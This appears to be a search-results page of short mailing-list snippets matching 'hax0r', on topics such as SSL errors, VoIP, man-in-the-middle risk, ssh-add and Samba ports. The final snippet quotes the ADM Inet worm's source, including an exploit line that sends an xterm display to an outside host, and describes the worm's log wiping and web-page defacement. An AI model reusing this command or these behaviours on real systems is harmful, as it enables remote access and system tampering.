search for: hax0r

...AP working fine, and I used mkcert.sh after editing the openssl config, and it seemed to work properly (I had to change some directories, I am using the FreeBSD 5.1-CURRENT port).. Anyway, when I try to connect using Outlook, here is what the log shows: (without the exact ip address shown, dont hax0r my windows machine!) imap-login: Jun 10 13:13:14 Warning: SSL_accept() failed: error:1408F455:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac [12.106.77.x] imap-login: Jun 10 13:13:14 Warning: SSL_accept() syscall failed: EOF [12.106.77.x] imap-login: Jun 10 13:13:14 Panic: key...

Asterisk must have a reasonably large community here in France judging from the number of people who came out to meet Mark. Either that or we were ALL there :) Something I've been waiting for, a voIP carrier on the models we are used to (low monthly or pay as you go, web account) has just set up their first beta test for 1 euro for the first month, 6euros if you decide to keep it. The basic

> A fully-encrypted connection would nearly eliminate the possibility of a > man-in-the-middle attack either hijacking the session or surreptitiously > switching bits mid-stream and changing the traffic on the fly. A man-in-the-middle attack is not easy to pull off. If you can show me why some person would be incented to attack someone like this, then maybe there is a case for it. As

...ber, that's actual work. My fear is the exploit-s'kiddie problem. > I see no reason why anyone would go to such great lengths to alter the > data in question. I see no reason why anyone would constantly scan huge netblocks of cable modem users, looking for the occasional target to haX0r. But that doesn't stop the people who do. And to Allen, yes, I know that it wouldn't stop all MitM attacks. That's why I said "nearly eliminate". Hell, I'd rather all traffic be fully IPSec'd (ESP + AH) all the time, but that's just not feasible. Frankly, I do...

...re common exploits for man-in-the-middle? I've never seen one. I've seen rootkits, crackers, DoS tools, etc. But never anything as sophisticated as mitm. > I see no reason why anyone would constantly scan huge netblocks of cable > modem users, looking for the occasional target to haX0r. But that doesn't > stop the people who do. This is different from mitm. Scanning and trying rootkits is trivial. mitm is not. It's a different kind of attack. It's probably one of the most sophisticated, and the most dangerous if pulled off in the right situations. jack. ---...

Evenin', I would like to know, why "OpenSSH ssh-add" doesn't support the -p (pipe) option of "Ssh-1.2.X shh-add"? I used it several time within scripts, like ./whisperpassphrase | ssh-add -p Well, I know this is some kind of security by obscurity, but this has been proven to be handy. Regards, Volker Paulsen -- OrbiTeam Software GmbH

Because of security reasons, my school has blocked tcp port 445 and 139. This make it impossible to for my window xp desktop to the remote samba service on Linux. Although the samba sercie on Linux and change its port by a "-p" option. But windows always look for 445 and 139 port. I've tried a lot of ways to work it out including local port redirection but none of them works. Is

...if you can find a way to delete the /etc/group file things could become rather messy. Finding a way to do that is left as an exercise for the reader (don't feel too bad I couldn't find one off the top of my head either). Sorry kids, nothing you can cut and paste to become a "pH34Rs0m3 hAx0r" today. Some extra tidbits: This does not affect redhat The file has to actually be non-existent (chmod 000 don't cut it). This seems to be a problem with all modern shadows, including the one in slackware 3.5 (980529). Shameless Plug: Visit http://shell.sy.net for the best she...

...INISH LIKE ME ! # ********************* THE CREW WILL NEVER DIE *************************** EMAIL="admsmb@hotmail.com" SAY="The ADM Inet w0rm is here !" -----Hnamed---- --= The ADM CreW =-- %s victim arg0 arg1 ... ex:sploits www.juergen.ch /usr/X11R6/bin/xterm -display ppp666.hax0r.com:0 ----- The worm is particularly amusing in that when run, along with portscanning, wiping logs, and all the other usual things you'd expect a worm to do, it also hunts for files with a .html suffix and inserts the contents of the "SAY" variable (above) into them, over-writing...